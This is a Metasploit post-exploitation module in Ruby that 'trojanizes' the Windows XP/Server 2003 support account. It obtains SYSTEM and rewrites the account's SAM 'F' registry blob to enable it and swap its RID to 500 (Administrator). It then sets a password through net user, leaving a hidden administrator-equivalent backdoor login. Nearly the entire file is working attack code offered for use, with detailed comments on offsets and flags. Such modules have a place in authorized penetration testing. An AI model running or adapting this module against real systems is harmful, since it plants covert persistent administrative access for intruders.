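##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Post module: re-enables the built-in SUPPORT_388945a0 account on XP / Server 2003
# era hosts, rewrites its RID to 500 (Administrator) directly inside the SAM 'F' blob
# and sets a password on it, leaving the operator a second administrator-equivalent
# login.
#
# Everything below is a raw SAM edit with no transactional safety and no revert path,
# so the original 'F' value is logged (verbose) before it is overwritten, which is
# enough to restore it by hand.
class MetasploitModule < Msf::Post
  include Msf::Post::Windows::Registry
  include Msf::Post::Windows::Priv

  # Account name the module looks for under HKLM\SAM\...\Users\Names.
  SUPPORT_ACCOUNT = 'SUPPORT_388945a0'.freeze
  # RID of the built-in Administrator account; the support account is re-mapped to it.
  ADMIN_RID = 500
  # Byte offset of the RID inside the SAM user 'F' structure (written as 2 bytes, LE).
  F_RID_OFFSET = 0x30
  # Byte offset of the account-control flags inside the 'F' structure.
  F_FLAGS_OFFSET = 0x38
  # Flag bit meaning "account disabled" in that field.
  ACB_DISABLED = 0x01
  # Exact flags value treated as "normal account, disabled" (0x10 | 0x01).
  FLAGS_NORMAL_DISABLED = 0x11

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Windows Manage Trojanize Support Account',
        'Description' => %q{
          This module enables alternative access to servers and workstations
          by modifying the support account's properties. It will enable
          the account for remote access as the administrator user while
          taking advantage of some weird behavior in lusrmgr.msc. It will
          check if sufficient privileges are available for registry operations,
          otherwise it exits.
        },
        'License' => MSF_LICENSE,
        'Author' => 'salcho <salchoman[at]gmail.com>',
        'Platform' => [ 'win' ],
        'SessionTypes' => [ 'meterpreter' ],
        'References' => [ 'http://xangosec.blogspot.com/2013/06/trojanizing-windows.html' ],
        'Compat' => {
          'Meterpreter' => {
            'Commands' => %w[
              priv_elevate_getsystem
            ]
          }
        }
      )
    )

    register_options(
      [
        OptString.new('PASSWORD', [true, 'Password of the support user account', 'password']),
        OptBool.new('GETSYSTEM', [true, 'Attempt to get SYSTEM privilege on the target host.', false])
      ]
    )
  end

  # Entry point. Every precondition (SYSTEM, supported OS, sane password) is
  # checked before the first registry write, because the SAM edit cannot be
  # rolled back by the module.
  def run
    reg_key = 'HKLM\\SAM\\SAM\\Domains\\Account\\Users'

    return unless ensure_system
    return unless supported_target?

    # The password is interpolated into a cmd.exe command line below, so reject
    # anything that could break out of the double quotes used there.
    password = datastore['PASSWORD'].to_s
    if password.empty? || password.match?(/["\x00-\x1f]/)
      print_error('PASSWORD must be non-empty and must not contain double quotes or control characters')
      return
    end

    names_key = registry_enumkeys(reg_key + '\\Names')
    unless names_key
      print_error("Couldn't access registry keys")
      return
    end

    rid = find_support_rid(reg_key, names_key)
    return if rid.nil?

    users_key = registry_enumkeys(reg_key)
    unless users_key
      print_error("Couldn't enumerate user keys")
      return
    end

    users_key.each do |r|
      # Subkeys are the RID in 8-digit hex (e.g. 000003E8).
      next if r.to_i(16) != rid

      f = registry_getvaldata(reg_key + "\\#{r}", 'F')
      unless f && f.bytesize > F_FLAGS_OFFSET
        print_error("Couldn't read the 'F' value for RID #{rid}")
        return
      end
      # Work on a binary copy: the offsets below are byte offsets, and String#[]=
      # indexes by character unless the string is ASCII-8BIT.
      f = f.b
      # Breadcrumb for manual cleanup, since there is no revert path.
      vprint_status("Original F value: #{f.unpack('H*')[0]}")

      if check_active(f)
        print_status('Account is disabled, activating...')
        # Clear only the disabled bit; with the 0x11 check this yields 0x10.
        f.setbyte(F_FLAGS_OFFSET, f.getbyte(F_FLAGS_OFFSET) & ~ACB_DISABLED)
      else
        # Kept as a warning only: the RID swap below still proceeds.
        print_error('Target account is already enabled')
      end

      print_status('Swapping RIDs...!')
      # Overwrite RID to 500 (as administrator)
      f = swap_rid(f, ADMIN_RID)

      open_key = registry_setvaldata(reg_key + "\\#{r}", 'F', f, 'REG_BINARY')
      unless open_key
        print_error("Can't write to registry... Something's wrong!")
        return
      end

      print_status("Setting password to #{password}")
      # NOTE(review): net.exe asks for confirmation when a password is longer than
      # 14 characters; cmd_exec provides no stdin, so such a password may hang
      # here -- confirm on a target before relying on long passwords.
      cmd = cmd_exec('cmd.exe', "/c net user #{SUPPORT_ACCOUNT} \"#{password}\"")
      vprint_status(cmd.to_s)
    end
  end

  # Makes sure the session runs as SYSTEM (needed to read/write HKLM\SAM),
  # attempting getsystem when the operator asked for it.
  # Returns true on success; prints an error and returns false otherwise.
  def ensure_system
    return true if is_system?

    unless datastore['GETSYSTEM']
      print_error('You need to run this script as system!')
      return false
    end

    print_status('Trying to get system...')
    res = session.priv.getsystem
    unless res[0]
      print_error('Unable to get system! You need to run this script.')
      return false
    end
    print_good('Got system!')
    true
  end

  # Restricts the module to XP SP0 .. Server 2003 SP2 builds, the range the
  # 'F' offsets used here were written for. Returns true when supported.
  def supported_target?
    version = get_version_info
    unless version.build_number.between?(Msf::WindowsVersion::XP_SP0, Msf::WindowsVersion::Server2003_SP2)
      print_error("#{version.product_name} is not supported")
      return false
    end
    print_status("Target OS is #{version.product_name}")
    true
  end

  # Looks up the support account under ...\Users\Names. The RID is read from the
  # 'Type' field of the subkey's default value (the SAM stores it there, not in
  # the value data), which is why registry_getvalinfo is used instead of getvaldata.
  # Returns the RID as an Integer, or nil (after printing an error) when the
  # account or its key cannot be found.
  def find_support_rid(reg_key, names_key)
    rid = nil
    print_status('Harvesting users...')
    names_key.each do |name|
      next unless name.include? SUPPORT_ACCOUNT

      print_good("Found #{name} account!")
      skey = registry_getvalinfo(reg_key + "\\Names\\#{name}", '')
      unless skey
        print_error("Couldn't open user's key")
        return nil
      end
      rid = skey['Type']
      print_status("Target RID is #{rid}")
    end

    print_error("Couldn't get user's RID...") if rid.nil?
    rid
  end

  # Returns true when the account-control flags byte of the 'F' blob is exactly
  # 0x11, i.e. a normal account (0x10) with the disabled bit (0x01) set. Despite
  # the name, a true result means the account is *disabled* and needs activating.
  # A nil or too-short blob yields false instead of raising.
  def check_active(f)
    return false if f.nil? || f.bytesize <= F_FLAGS_OFFSET

    f.getbyte(F_FLAGS_OFFSET) == FLAGS_NORMAL_DISABLED
  end

  # Returns a binary copy of the 'F' blob with the 16-bit little-endian RID at
  # offset 0x30 replaced by +rid+. Only two bytes are written (as before), so the
  # RID must fit in 16 bits.
  # Raises ArgumentError for an out-of-range RID or a blob too short to hold it.
  def swap_rid(f, rid)
    raise ArgumentError, "RID #{rid} does not fit in 16 bits" unless rid.between?(0, 0xFFFF)

    patched = f.b
    raise ArgumentError, "'F' value too short (#{patched.bytesize} bytes)" if patched.bytesize < F_RID_OFFSET + 2

    patched[F_RID_OFFSET, 2] = [rid].pack('v')
    patched
  end
end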